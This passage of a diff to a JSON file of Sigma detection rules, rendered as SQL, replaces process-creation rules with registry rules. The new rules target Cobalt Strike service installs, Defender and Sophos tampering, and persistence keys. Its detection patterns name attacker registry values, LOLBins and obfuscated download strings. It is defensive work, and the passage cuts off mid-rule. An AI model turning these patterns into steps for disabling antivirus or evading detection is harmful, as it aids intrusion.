AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' 